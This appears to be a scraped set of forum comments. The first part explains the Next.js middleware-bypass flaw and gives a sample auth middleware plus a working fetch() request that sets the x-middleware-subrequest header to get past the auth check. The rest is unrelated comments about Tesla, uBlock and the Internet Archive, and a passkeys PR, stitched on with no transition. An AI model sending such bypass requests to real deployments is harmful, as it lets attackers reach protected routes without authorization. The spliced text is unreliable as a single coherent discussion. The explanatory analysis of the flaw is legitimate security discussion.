> Next.js uses an internal header x-middleware-subrequest to prevent recursive requests from triggering infinite loops. The security report showed it was possible to skip running Middleware, which could allow requests to skip critical checks—such as authorization cookie validation—before reaching routes.
If I’m reading the code right, it supports their hybrid model, where your code can run in three places: the user’s browser, Vercel’s edge, and an actual server. It looks like the idea was for code in the edge context to be able to call the server faster, but nothing protected that path from anyone else calling it directly.
If I have that right, this is a security review failure: people perennially try that optimization and have it end poorly for reasons like this. It’s safer, and almost always less work, to treat all calls equally and optimize if needed, rather than having to support an “internal” call type over the same interface.
As I understand it, the middleware runs before a request hits a page or API route, so to avoid infinite loops from internal subrequests (URL rewrites, etc.), Next.js tags them with the x-middleware-subrequest header. This tells the runtime to skip middleware for those requests and proceed directly to the target. Unfortunately, this also works externally.
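To make that concrete, here's a minimal sketch. The route, cookie name, and domain are made up for illustration; the header values are the ones publicly reported for affected versions. A typical cookie-checking middleware looks something like this:

```ts
// middleware.ts — hypothetical auth gate of the kind this bypass defeats
import { NextResponse } from "next/server";
import type { NextRequest } from "next/server";

export function middleware(req: NextRequest) {
  // Reject unauthenticated requests before they ever reach the route.
  if (!req.cookies.get("session")) {
    return NextResponse.redirect(new URL("/login", req.url));
  }
  return NextResponse.next();
}

// Only guard the admin section (illustrative matcher).
export const config = { matcher: ["/admin/:path*"] };
```

Because the runtime trusts the subrequest marker, an external client can set it itself and walk straight past that check:

```ts
// The accepted value varies by Next.js version: older releases matched
// middleware names like "pages/_middleware", while later ones matched a
// "middleware" segment repeated enough times to trip the recursion-depth
// check. Target URL is hypothetical.
const res = await fetch("https://example.com/admin/dashboard", {
  headers: {
    "x-middleware-subrequest":
      "middleware:middleware:middleware:middleware:middleware",
  },
});
console.log(res.status); // 200 on a vulnerable version, despite no cookie
```

The patched versions stop honoring the externally supplied header, which is essentially the "treat all calls equally" point above.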
Sure, you can join something like that, too. That's not the important part. The important part is to get a sustainable business out of it. Just 5 years ago nobody believed this was doable.
Five years ago they weren’t there anymore. And Musk famously slept in the office and nearly went bankrupt and insane trying to ramp up production of the Model 3.
My bad, it wasn't visible until I disabled uBlock; the requests seem to be caught by the "uBlock filters – Privacy" list. Does the IA actually run the JS and archive the fetched JSON on its own, or does it depend on someone visiting the archive page with their browser to trigger archival of this JSON data?
Yeah, this isn't new. I've been advocating for this since 2018[1], and the PR in question was submitted in November 2022.
The PR isn't dead, though. There's some additional discussion[2] on its current state in the issue I linked above. Basically, it needs more people to test the implementation against different sites in the wild.
Hopefully the increasing popularity of passkeys will provide the necessary level of motivation and support to get this over the finish line.